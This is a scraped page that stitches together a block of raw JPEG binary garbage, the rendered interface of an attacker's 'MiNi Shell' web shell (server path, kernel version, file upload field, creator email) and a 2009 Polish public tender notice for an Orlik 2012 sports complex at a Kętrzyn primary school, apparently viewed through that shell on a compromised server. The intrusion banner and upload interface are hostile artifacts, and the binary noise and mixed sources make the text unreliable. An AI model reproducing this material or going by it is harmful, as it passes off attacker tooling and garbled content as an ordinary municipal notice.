JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090521/161100-N-2009.html

<p class="kh_header"><b>Kętrzyn: Budowa boiska sportowego Moje Boisko - Orlik 2012 przy Szkole Podstawowej nr 4 w Kętrzynie</b><br>
<b>Numer ogłoszenia: 161100 - 2009; data zamieszczenia: 21.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kętrzyn , ul. Wojska Polskiego 11, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 752 05 20, faks 089 752 05 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ketrzyn.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa boiska sportowego Moje Boisko - Orlik 2012 przy Szkole Podstawowej nr 4 w Kętrzynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.	Przedmiot zamówienia obejmuje:

2.1. Budowa boiska do piłki nożnej z ogrodzeniem po obwodzie boiska 
o wymiarach 30,0 m x 62,0m o pow. całkowitej 1860m2 z polem gry o wymiarach 26,0 m x 56,0 m 
 2.1.1 podbudowa przepuszczalna
- grunt rodzimy, zagęszczony
- warstwa odsączająca z piasku lub pospółki o gr 15 cm,
- warstwa geowłókniny z polipropylenem typu TYPAR SF - 32 do separacji wzmocnienia gruntu,
- warstwa odsączająca z piasku lub pospółki o gr. 30 cm
- warstwa geowłókniny z polipropylenem typu TYPAR SF - 32 do separacji wzmocnienia gruntu,
- warstwa konstrukcyjna z kruszywa kamiennego (fr. 31,5 ÷ 63 m)gr. 10 cm,
- warstwa klinująca z kruszywa kamiennego (fr.0÷31,5mm) o gr. 5 cm
- warstwa wyrównująca z miału kamiennego (fr. 0 ÷ 4mm) o gr. 4cm,
Boisko należy oddzielić od sąsiadujących elementów terenu za pomocą obrzeży betonowych
8x30x100 układanych na ławie z betonu B - 15 z oporem. Na powierzchni boiska należy
wyprofilować spadki o wartości minimalnej 0,5%.

2.1.2.Nawierzchnia do piłki nożnej - sztuczna syntetyczna trawa
Wysokość włókna min. 60 mm na podbudowie z kruszywa (wypełnienie  trawy zgodnie z badaniem specjalistycznego laboratorium np. Labosport) 
1.Typ włókna: monofil o przekroju łukowatym, wzmocnionych wtopionym rdzeniem.
2. Skład chemiczny włókna; polietylen
3.Ciężar włókna: min. 11.000 Dtex,
4.Gęstość trawy: min. 97.000 włókien /m2
  2.1.3. Obrzeża betonowe na ławie betonowej oddzielające sąsiednie elementy terenu od płyty boiska. 
2.1.4. Wyposażenie boiska
- bramki aluminiowe mocowane w tulejach				- 2 sztuki
- siatki do bramek                                        				- 2 sztuki
- pozostałe elementy wyposażenia boiska określone są w dokumentacji projektowej o raz specyfikacji technicznej wykonania i odbioru robót. 

Szczegółowy zakres robót opisany został dokumentacji projektowej (zał. nr 6 do SIWZ), specyfikacjach technicznych wykonania i odbioru robót budowlanych (zał. nr 7 do SIWZ).

2.2. Budowa boiska wielofunkcyjnego do piłki siatkowej i piłki koszykowej
o wymiarach 19,1 x 32,1 m o powierzchni 613,11m2 (pole do gry 15,1 x 28,1 m)
 
2.2.1. podbudowa przepuszczalna z drenażem podpowierzchniowym i liniowym 
 - grunt rodzimy, zagęszczony
- warstwa odsączająca z piasku lub pospółki o gr 15 cm,
- warstwa geowłókniny z polipropylenem typu TYPAR SF - 32 do separacji wzmocnienia gruntu,
- warstwa odsączająca z piasku lub pospółki o gr. 30 cm
- warstwa geowłókniny z polipropylenem typu TYPAR SF - 32 do separacji wzmocnienia gruntu,
- warstwa konstrukcyjna z kruszywa kamiennego (fr. 31,5 ÷ 63 m)gr. 10 cm,
- warstwa klinująca z kruszywa kamiennego (fr.0÷31,5mm) o gr. 5 cm
- warstwa wyrównująca z miału kamiennego (fr. 0 ÷ 4mm) o gr. 4cm,
Podbudowę należy oddzielić od sąsiadujących elementów terenu za pomocą obrzeży betonowych 8x30x100 układanych na ławie z betonu B - 10 z oporem(po stronach krótszych krawędzi boiska)oraz odwodnieniem liniowym. Na powierzchni boiska należy wyprofilować spadki o wartości minimalnej 1,0%

2.2.2. nawierzchnia boiska wielofunkcyjnego- nawierzchnia poliuretanowa 
o właściwościach i technologii układania określonych w dokumentacji projektowej (załącznik nr 6 do SIWZ)  i specyfikacji technicznej wykonania i odbioru robót 
( załącznik nr 7 do SIWZ).    
Nawierzchnia - poliuretan na podbudowie dynamicznej. Jest to nawierzchnia sportowa, poliuretanowo - gumowa o warstwie 13mm. Nawierzchnia ta jest przepuszczalna dla wody, o zwartej strukturze, służy do pokrywania nawierzchni bieżni lekkoatletycznych, sektorów i rozbiegów konkurencji technicznych zawodów, boisk wielofunkcyjnych, szkolnych, placów rekreacji ruchowej.
Technologie układania nawierzchni: Technologia typu NATRYSK - na podbudowie z kruszywa kamiennego instaluje się warstwę przepuszczalną dla wody i warstwę stabilizującą typu ET (w przypadku nieprzepuszczalnej podbudowy betonowej, asfaltowej lub asfaltowo-betonowej warstwa ET nie jest wymagana). Następnie warstwę gr. 10-11 mm z granulatu SBR, następnie warstwę natrysku (mieszanka granulatu EPDM zmieszana z PU) o grubości 2-3mm.
Nawierzchnia składa się z dwóch warstw: elastyczne (nośnej) i użytkowej. Warstwa nośna to mieszanina granulatu gumowego i lepiszcza poliuretanowego. Układana jest mechanicznie, bez spoinowo, przy pomocy rozkładarki mas poliuretanowych. Tak wykonaną warstwę należy pokryć warstwą użytkową, która stanowi system poliuretanowy zmieszany z granulatem. Czynność tą wykonuje się poprzez natrysk mechaniczny (przy użyciu specjalnej natryskarki). Grubość warstwy użytkowej 2 ÷ 3mm. Po całkowitym związaniu komponentów na nawierzchni są malowane linie poliuretanowymi metodą natrysku.           
Szczegółowy zakres robót opisany został dokumentacji projektowej (zał. nr 6 do SIWZ), specyfikacjach technicznych wykonania i odbioru robót budowlanych (zał. nr 7 do SIWZ).

2.2.3. Wyposażenie do piłki koszykowej
- obręcz do koszykówki standard i siatka do obręczy		  		- 2 sztuki
- tablica do koszykówki epoksydowa o wym. 105 x 180cm			- 2 sztuki
- mechanizm regulacji wysokości 						        - 2 sztuki
- konstrukcja do koszykówki dwusłupowa, montowana w tulejach 		- 2 sztuki
- pozostałe elementy wyposażenia boiska określone są w dokumentacji projektowej oraz
specyfikacji technicznej wykonania i odbioru robót.

2.2.4. Wyposażenie  do piłki siatkowej
- słupki do siatkówki, aluminiowe wielofunkcyjne	
(badminton, tenis, siatkówka)							- 2 sztuki
- siatka do siatkówki 								- 1 sztuka
- pozostałe elementy wyposażenia boiska określone są w dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót.

2.3. Bieżnia cztero torowa 60 m + 10 mb hamownia
Wymagania dotyczące podbudowy i nawierzchni bieżni, jak w przypadku boiska wielofunkcyjnego do piłki siatkowej i piłki koszykowej. 

2.4. Ogrodzenie terenu i piłkochwyty
Szczegółowe rozwiązania wg dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót.

2.5. Oświetlenie terenu 
Oświetlenie obiektu będą stanowiły projektory zamocowane na 8 masztach o wysokości min. 9 m.  Szczegółowe rozwiązania wg dokumentacji projektowej  oraz specyfikacji technicznej wykonania i odbioru robót. Pozostałe instalacje zawiera dokumentacja architektoniczno - budowlana.

2.5. Chodniki
Ciągi komunikacyjne i powierzchnia przeznaczona pod kontener (na odpadki stałe) - kostka betonowa, brukowa gr. min 6 cm, na podbudowie z piasku i kruszywa, zamknięta obrzeżem betonowym. Szczegółowe rozwiązania wg dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót.

2.6. Fundamenty pod budynek zaplecza socjalnego 
Fundamenty i roboty związane z ich wykonaniem należy wykonać zgodnie z dokumentacją projektową (załącznik nr 6 do SIWZ)  i specyfikacją techniczną wykonania i odbioru robót (załącznik nr 7 do SIWZ).    
Dokumentacja zamienna fundamentowania związana ze zmianą technologii wykonania budynku socjalnego  z kontenerowej  na tradycyjną murowaną. 

2.7. Budowa budynku sanitarno-szatniowego
wg opisu w dokumentacji projektowej z niżej wskazanymi uwagami:
szklenia w oknach zaplecza z szybą bezpieczną (klejoną)
drzwi zewnętrzne stalowe, antywłamaniowe w kolorze uzgodnionym z Zamawiającym.

3. Szczegółowy opis przedmiotu zamówienia stanowią załączniki
załącznik nr 6 do SIWZ	dokumentacja projektowa
załącznik nr 7 do SIWZ 	specyfikacja techniczna wykonania i odbioru robót

4. Wymagany okres gwarancji:
4.1.	na wykonane roboty ( materiały, robocizna, budynek) wynosi 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.
4.2.	na nawierzchnie syntetyczne - 60 miesięcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 15.000,00zł (słownie złotych: piętnaście tysięcy złotych 00/100).
2.	Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. Nr z 2007 Nr 42, poz. 275 ze zm. ).
3.	Wykonawca zobowiązany jest skutecznie wnieść wadium przed upływem terminu składania ofert,  tzn. do dnia 10.06.2009 r. do godz. 1200 kwota 15.000,00 zł winna znajdować się na rachunku bankowym lub w kasie Zamawiającego albo być pokwitowana przez Zamawiającego.
4.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
  Pekao SA nr konta  94 1240 5598 1111 0000 5032 0624
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego- Urząd Miasta Kętrzyn, 11-400 Kętrzyn, ul. Wojska Polskiego 11, parter - Punkt Obsługi Interesantów (parter Urzędu Miasta)  lub dołączyć do oferty.
7.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy Pzp. 
2.	Spełnienie warunków udziału odnoszących się do posiadania niezbędnej wiedzy i doświadczenia,  dysponowania  osobami zdolnymi do wykonania zamówienia oraz sytuacji finansowej i ekonomicznej zostanie ocenione według poniższych zasad :

1)	 udokumentowane należyte wykonanie, w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie obiektów sportowych (CPV 45.21.22.21-1), w tym: jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej  i jednego boiska z nawierzchnią poliuretanową o łącznej wartości minimalnej 500.000 zł ,
2)	dysponowaniem w celu wykonania zamówienia przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności:
a)	konstrukcyjno-budowlanej, 
b)	instalacyjnej w zakresie sieci, instalacji wodociągowych
i kanalizacyjnych, 
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych.

3)	ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN. 

3.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły (spełnia - nie spełnia), w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
4.	Zamawiający wezwie w trybie art.26 ust.3 Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:

1)	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 2 oraz Załącznik Nr 3 do niniejszej SIWZ. 
2)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3)	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4)	Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2.	W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia do oferty dołączyć należy:

1) Wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na budowie obiektów sportowych (CPV 45.21.22.21-1), w tym: jednego boiska piłkarskiego z nawierzchnią z trawy syntetycznej i jednego boiska z nawierzchnią poliuretanową o łącznej wartości minimalnej 500.000 zł, z podaniem ich wartości, dat wykonania oraz odbiorców. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.) Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 1 do niniejszej SIWZ.
2) Dokumenty potwierdzające posiadanie uprawnień budowlanych do kierowania robotami budowlanymi przez wskazane w wykazie osoby w zakresie niezbędnym do wykonania zamówienia w specjalnościach: 
1) 	konstrukcyjno-budowlanej, 
2)	instalacyjnej w zakresie sieci, instalacji wodociągowych
i kanalizacyjnych,
 3)		instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 	i elektroenergetycznych.
oraz aktualne zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby.

3.	W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty dołączyć należy:
1)	 Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN. 
Przy składaniu ofert przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy mogą złożyć jedną wspólną polisę potwierdzającą, że wszyscy Wykonawcy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 500 000 PLN.
4.	      	Wykaz oświadczeń lub dokumentów potwierdzających spełnianie warunków  jakościowych, które należy dołączyć do oferty:

A.	Dokumenty dotyczące nawierzchni z trawy syntetycznej:
1.	Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z Handbook of Test Methods for Football Turf (dostępny na FIFA.com).
2.	Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1/2008, lub
aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny. 
3.	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
4.	Atest PZH dla oferowanej nawierzchni.
5.	Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.

B.	Dokumenty dotyczące nawierzchni poliuretanowej:

1.	Certyfikat lub deklaracja zgodności z normą PN-EN 14877/2008, lub aprobata techniczna ITB, lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, lub dokument równoważny.
2.	Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
3.	Atest PZH dla oferowanej nawierzchni.
4.	Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ketrzyn.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kętrzyn
ul. Wojska Polskiego11
11-400 Kętrzyn
pok. 306.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2009 godzina 12:00, miejsce: Urząd Miasta Kętrzyn
ul. Wojska Polskiego11
11-400 Kętrzyn
Punkt Obsługi Interesanta (parter Urzędu Miasta).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com